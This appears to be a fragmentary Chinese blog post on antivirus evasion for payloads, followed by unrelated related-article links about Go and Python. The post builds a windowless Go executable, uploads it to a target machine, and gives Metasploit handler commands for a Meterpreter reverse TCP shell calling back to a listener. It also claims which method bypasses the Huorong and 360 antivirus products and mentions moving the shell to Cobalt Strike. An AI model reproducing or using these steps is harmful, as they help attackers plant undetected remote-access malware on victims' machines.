生成exe文件

go build -ldflags="-H windowsgui" .\main.go

上传到靶机测试下

MSF免杀

640.png

选择windows 模块  2

选择攻击类型  1

选择加密类型 2

选择方式 1


启动msf

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.0.0.10
set lport 8888
run

第一种免杀 使用python + go  可以绕过火绒 360直接杀

PS:(网上的师傅操作是可以,大概可能是360版本或者病毒库未更新)

第二种使用的是py的框架 后续也可以转移shell至CS 都可以成功绕过

相关文章
|
1月前
|
算法 Go Python
获取指定范围符合正态分布的随机数Go/Python
获取指定范围符合正态分布的随机数Go/Python
33 0
|
1月前
|
Go Docker Python
docker的python与go镜像的制作
docker的python与go镜像的制作
30 1
|
1月前
|
算法 安全 Go
RSA加密算法详解与Python和Go实现
RSA加密算法详解与Python和Go实现
94 1
|
1月前
|
算法 安全 Go
Python与Go语言中的哈希算法实现及对比分析
Python与Go语言中的哈希算法实现及对比分析
40 0
|
1月前
|
安全 测试技术 Go
Python 和 Go 实现 AES 加密算法的技术详解
Python 和 Go 实现 AES 加密算法的技术详解
75 0
|
1月前
|
机器学习/深度学习 自然语言处理 Go
Python与Go在AIGC领域的应用:比较与分析
Python与Go在AIGC领域的应用:比较与分析
40 0
|
3月前
|
Rust JavaScript Java
简单对比Java、Python、Go、Rust等常见语言计算斐波拉契数的性能
简单对比Java、Python、Go、Rust等常见语言计算斐波拉契数的性能
|
5月前
|
Java Go C#
编程语言C#、C++、Java、Python、go 选择哪个好?
我想说的是,不论选择哪种编程语言,决定选择的都是你最终的目的,做选择之前,先充分调研每一个选择项,再做选择思路就会非常清晰了。
117 3
|
5月前
|
Go Python
go语言调用python脚本
go语言调用python脚本
85 0
|
5月前
|
SQL 算法 数据挖掘
LeetCode 第四题:寻找两个正序数组的中位数 【4/1000 】【python + go】
LeetCode 第四题:寻找两个正序数组的中位数 【4/1000 】【python + go】